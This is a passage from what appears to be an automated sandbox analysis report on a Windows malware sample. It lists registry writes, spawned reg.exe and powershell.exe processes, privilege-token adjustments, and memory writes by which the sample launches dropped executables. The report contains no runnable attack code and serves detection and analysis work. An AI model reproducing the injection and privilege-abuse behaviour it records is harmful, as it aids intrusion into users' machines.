Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{AB0CB6A7-2475-4749-8CF1-8130AF00CDEF} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = de92a2345dabd801 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 294ba85b5dabd801 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658BE = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 2bc776549d9ad801 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = df9e50355dabd801 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 309e8b9f8fabd801 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 5376 reg.exe 2644 reg.exe 5056 reg.exe 4352 reg.exe 5440 reg.exe 6176 reg.exe 6312 reg.exe 6512 reg.exe 5324 reg.exe 4988 reg.exe 3140 reg.exe 5848 reg.exe 6136 reg.exe 6256 reg.exe 6552 reg.exe 5184 reg.exe 3336 reg.exe 1588 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
real.exetag.exesafert44.exejshainx.exeMouseAtHome.exenamdoitntn.exeWindows.exepowershell.exepowershell.exesvchost.exepowershell.execonhost.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exepid process 4688 real.exe 4688 real.exe 4196 tag.exe 4196 tag.exe 4720 safert44.exe 4720 safert44.exe 4868 jshainx.exe 4868 jshainx.exe 4112 MouseAtHome.exe 4112 MouseAtHome.exe 4676 namdoitntn.exe 4676 namdoitntn.exe 5220 Windows.exe 5220 Windows.exe 4752 powershell.exe 4752 powershell.exe 4752 powershell.exe 4752 powershell.exe 5428 powershell.exe 5428 powershell.exe 5428 powershell.exe 6084 svchost.exe 6084 svchost.exe 5428 powershell.exe 5348 powershell.exe 5348 powershell.exe 5348 powershell.exe 5348 powershell.exe 4196 conhost.exe 4196 conhost.exe 4752 powershell.exe 4752 powershell.exe 5068 powershell.EXE 5068 powershell.EXE 4752 powershell.exe 5068 powershell.EXE 5068 powershell.EXE 4752 powershell.exe 5068 powershell.EXE 5972 powershell.EXE 5972 powershell.EXE 5448 dllhost.exe 5448 dllhost.exe 5972 powershell.EXE 5972 powershell.EXE 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
MicrosoftEdgeCP.exepid process 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exetag.exesafert44.exejshainx.exeMouseAtHome.exenamdoitntn.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2800 MicrosoftEdge.exe Token: SeDebugPrivilege 2800 MicrosoftEdge.exe Token: SeDebugPrivilege 2800 MicrosoftEdge.exe Token: SeDebugPrivilege 2800 MicrosoftEdge.exe Token: SeDebugPrivilege 3216 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3216 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3216 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3216 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5484 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5484 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4196 tag.exe Token: SeDebugPrivilege 4720 safert44.exe Token: SeDebugPrivilege 4868 jshainx.exe Token: SeDebugPrivilege 4112 MouseAtHome.exe Token: SeDebugPrivilege 4676 namdoitntn.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeIncreaseQuotaPrivilege 5428 powershell.exe Token: SeSecurityPrivilege 5428 powershell.exe Token: SeTakeOwnershipPrivilege 5428 powershell.exe Token: SeLoadDriverPrivilege 5428 powershell.exe Token: SeSystemProfilePrivilege 5428 powershell.exe Token: SeSystemtimePrivilege 5428 powershell.exe Token: SeProfSingleProcessPrivilege 5428 powershell.exe Token: SeIncBasePriorityPrivilege 5428 powershell.exe Token: SeCreatePagefilePrivilege 5428 powershell.exe Token: SeBackupPrivilege 5428 powershell.exe Token: SeRestorePrivilege 5428 powershell.exe Token: SeShutdownPrivilege 5428 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeSystemEnvironmentPrivilege 5428 powershell.exe Token: SeRemoteShutdownPrivilege 5428 powershell.exe Token: SeUndockPrivilege 5428 powershell.exe Token: SeManageVolumePrivilege 5428 powershell.exe Token: 33 5428 powershell.exe Token: 34 5428 powershell.exe Token: 35 5428 powershell.exe Token: 36 5428 powershell.exe Token: SeDebugPrivilege 5348 powershell.exe Token: SeIncreaseQuotaPrivilege 5348 powershell.exe Token: SeSecurityPrivilege 5348 powershell.exe Token: SeTakeOwnershipPrivilege 5348 powershell.exe Token: SeLoadDriverPrivilege 5348 powershell.exe Token: SeSystemProfilePrivilege 5348 powershell.exe Token: SeSystemtimePrivilege 5348 powershell.exe Token: SeProfSingleProcessPrivilege 5348 powershell.exe Token: SeIncBasePriorityPrivilege 5348 powershell.exe Token: SeCreatePagefilePrivilege 5348 powershell.exe Token: SeBackupPrivilege 5348 powershell.exe Token: SeRestorePrivilege 5348 powershell.exe Token: SeShutdownPrivilege 5348 powershell.exe Token: SeDebugPrivilege 5348 powershell.exe Token: SeSystemEnvironmentPrivilege 5348 powershell.exe Token: SeRemoteShutdownPrivilege 5348 powershell.exe Token: SeUndockPrivilege 5348 powershell.exe Token: SeManageVolumePrivilege 5348 powershell.exe Token: 33 5348 powershell.exe Token: 34 5348 powershell.exe Token: 35 5348 powershell.exe Token: 36 5348 powershell.exe Token: SeShutdownPrivilege 4900 powercfg.exe Token: SeCreatePagefilePrivilege 4900 powercfg.exe Token: SeShutdownPrivilege 5420 powercfg.exe Token: SeCreatePagefilePrivilege 5420 powercfg.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
dwm.exepid process 992 dwm.exe 992 dwm.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeConhost.exeConhost.exepid process 2800 MicrosoftEdge.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 4824 Conhost.exe 5336 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exeMicrosoftEdgeCP.exeMouseAtHome.exedescription pid process target process PID 3596 wrote to memory of 4676 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe namdoitntn.exe PID 3596 wrote to memory of 4676 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe namdoitntn.exe PID 3596 wrote to memory of 4676 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe namdoitntn.exe PID 3596 wrote to memory of 4688 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe real.exe PID 3596 wrote to memory of 4688 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe real.exe PID 3596 wrote to memory of 4688 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe real.exe PID 3596 wrote to memory of 4720 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe safert44.exe PID 3596 wrote to memory of 4720 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe safert44.exe PID 3596 wrote to memory of 4720 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe safert44.exe PID 3596 wrote to memory of 4768 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe kukurzka9000.exe PID 3596 wrote to memory of 4768 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe kukurzka9000.exe PID 3596 wrote to memory of 4768 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe kukurzka9000.exe PID 1336 wrote to memory of 1548 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1548 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1548 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1548 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3216 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3216 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3216 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3216 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 3596 wrote to memory of 5008 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe F0geI.exe PID 3596 wrote to memory of 5008 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe F0geI.exe PID 3596 wrote to memory of 5008 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe F0geI.exe PID 3596 wrote to memory of 4196 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe tag.exe PID 3596 wrote to memory of 4196 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe tag.exe PID 3596 wrote to memory of 4196 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe tag.exe PID 1336 wrote to memory of 1332 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1332 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1332 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1332 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 3596 wrote to memory of 4868 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe jshainx.exe PID 3596 wrote to memory of 4868 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe jshainx.exe PID 3596 wrote to memory of 4868 3596 